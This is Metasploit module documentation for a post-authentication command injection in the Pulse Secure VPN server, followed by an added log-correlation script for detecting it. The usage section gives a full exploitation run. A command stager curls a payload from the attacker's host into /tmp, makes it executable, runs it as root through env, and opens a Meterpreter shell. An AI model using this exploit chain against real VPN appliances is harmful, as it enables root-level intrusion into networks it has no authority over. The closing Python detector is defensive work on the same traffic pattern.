## Introduction

This module exploits a post-auth command injection in the Pulse Secure VPN server to execute commands as root. The env(1) command is used to bypass application whitelisting and run arbitrary commands.

Please see the related module `auxiliary/gather/pulse_secure_file_disclosure` for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit.

A valid administrator session ID is required in lieu of untested SSRF.

## Targets

```
Id  Name
--  ----
0   Unix In-Memory
1   Linux Dropper
```

## Options

**SID**

Set this to a valid administrator session ID. Typically retrieved using the `auxiliary/gather/pulse_secure_file_disclosure` module.

## Usage

```
msf5 exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857
sid => 676f5f892e8c4a6419f10564f9e9d857
msf5 exploit(linux/http/pulse_secure_cmd_exec) > run

[*] Started reverse TCP handler on 127.0.0.1:[redacted]
[+] Setting session cookie: DSID=676f5f892e8c4a6419f10564f9e9d857
[*] Obtaining CSRF token
[+] CSRF token: 6b0e020e1de8c68c043ea0e4f663b7a5
[*] Executing Linux Dropper target
[*] Using URL: https://0.0.0.0:[redacted]/HSEjp77
[*] Local IP: https://[redacted]:[redacted]/HSEjp77
[*] Generated command stager: ["curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77", "chmod +x /tmp/qlUqDxCU", "/tmp/qlUqDxCU", "rm -f /tmp/qlUqDxCU"]
[*] Executing command: env /home/bin/curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[*] Client 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) requested /HSEjp77
[*] Sending payload to 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18)
[+] Payload execution successful
[*] Command Stager progress -  63.96% done (71/111 bytes)
[*] Executing command: env chmod +x /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[+] Payload execution successful
[*] Command Stager progress -  87.39% done (97/111 bytes)
[*] Executing command: env /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[*] Meterpreter session 1 opened (127.0.0.1:[redacted] -> 127.0.0.1:53200) at 2019-11-12 02:05:40 -0600
[!] Payload execution may have failed
[*] Command Stager progress - 102.70% done (114/111 bytes)
[*] Executing command: env rm -f /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[+] Payload execution successful
[*] Command Stager progress - 123.42% done (137/111 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : [redacted]
OS           : (Linux 2.6.32-00486-gddd7e32-dirty)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
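As an added defensive example (not part of the module or its documentation): the Usage output above shows every staged command hitting `/dana-admin/diag/diag.cgi` and then `/dana-na/auth/setcookie.cgi` in quick succession, and the script below correlates that pairing per client IP over constructed Common Log Format access-log lines. The log layout, the 30-second window and the sample addresses are assumptions to adjust to the appliance's real logs.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines in Common Log Format (assumed layout, not the
# appliance's real log format). 203.0.113.5 shows the diag.cgi -> setcookie.cgi
# pairing twice; 198.51.100.7 hits both endpoints but 15 minutes apart.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Nov/2019:02:05:31 -0600] "POST /dana-admin/diag/diag.cgi HTTP/1.1" 200 512
203.0.113.5 - - [12/Nov/2019:02:05:32 -0600] "GET /dana-na/auth/setcookie.cgi HTTP/1.1" 200 0
203.0.113.5 - - [12/Nov/2019:02:05:35 -0600] "POST /dana-admin/diag/diag.cgi HTTP/1.1" 200 512
203.0.113.5 - - [12/Nov/2019:02:05:36 -0600] "GET /dana-na/auth/setcookie.cgi HTTP/1.1" 200 0
198.51.100.7 - - [12/Nov/2019:02:10:00 -0600] "POST /dana-admin/diag/diag.cgi HTTP/1.1" 200 512
198.51.100.7 - - [12/Nov/2019:02:25:00 -0600] "GET /dana-na/auth/setcookie.cgi HTTP/1.1" 200 0
192.0.2.9 - - [12/Nov/2019:03:00:00 -0600] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 4096
"""

# client ip, timestamp, method, path, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
DIAG = "/dana-admin/diag/diag.cgi"          # endpoint the module posts the injection to
TRIGGER = "/dana-na/auth/setcookie.cgi"     # endpoint the module requests to trigger it

def parse(lines):
    """Yield (ip, datetime, method, path, status) for each line that matches LOG_RE."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        yield ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def find_diag_trigger_pairs(log_text, window_seconds=30):
    """Count, per client IP, diag.cgi POSTs followed by setcookie.cgi within the window."""
    pending = defaultdict(list)   # ip -> timestamps of diag.cgi POSTs not yet paired
    hits = defaultdict(int)
    for ip, when, method, path, _status in parse(log_text.splitlines()):
        if path == DIAG and method == "POST":
            pending[ip].append(when)
        elif path == TRIGGER and pending[ip]:
            cutoff = when - timedelta(seconds=window_seconds)
            if any(t >= cutoff for t in pending[ip]):
                hits[ip] += 1
            pending[ip] = []      # each trigger consumes the outstanding diag.cgi POSTs
    return dict(hits)

if __name__ == "__main__":
    print(find_diag_trigger_pairs(SAMPLE_LOG))
```

Legitimate administrators also use diag.cgi, so treat a hit as a lead to review together with the admin session (DSID) that issued the requests, not as proof of compromise on its own.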